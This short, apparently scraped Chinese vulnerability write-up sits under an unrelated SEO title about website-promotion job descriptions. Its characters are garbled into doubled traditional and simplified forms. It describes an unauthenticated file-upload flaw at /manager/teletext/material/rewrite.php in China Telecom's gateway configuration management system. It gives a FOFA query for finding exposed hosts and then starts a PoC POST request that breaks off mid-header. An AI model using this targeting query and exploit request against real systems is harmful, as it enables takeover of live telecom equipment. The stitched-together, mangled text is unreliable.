做培訓(xùn)的網(wǎng)站建設(shè)網(wǎng)絡(luò)推廣工作內(nèi)容怎么寫
0x01 產(chǎn)品簡(jiǎn)介
中國電信集團(tuán)有限公司(英文名稱“China Telecom”、簡(jiǎn)稱“中國電信”)成立于2000年9月,是中國特大型國有通信企業(yè)、上海世博會(huì)全球合作伙伴。電信網(wǎng)關(guān)配置管理系統(tǒng)是一個(gè)用于管理和配置電信網(wǎng)絡(luò)中網(wǎng)關(guān)設(shè)備的軟件系統(tǒng)。它可以幫助網(wǎng)絡(luò)管理員實(shí)現(xiàn)對(duì)網(wǎng)關(guān)設(shè)備的遠(yuǎn)程監(jiān)控、配置、升級(jí)和故障排除等功能,從而確保網(wǎng)絡(luò)的正常運(yùn)行和高效性能。
0x02 漏洞概述
電信網(wǎng)關(guān)配置管理系統(tǒng) /manager/teletext/material/rewrite.php 接口存在文件上傳漏洞,未經(jīng)身份驗(yàn)證的遠(yuǎn)程攻擊者可以利用文件上傳漏洞獲取系統(tǒng)權(quán)限。
0x03 復(fù)現(xiàn)環(huán)境
FOFA:body="img/login_bg3.png" && body="系統(tǒng)登錄"
0x04 漏洞復(fù)現(xiàn)
PoC
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.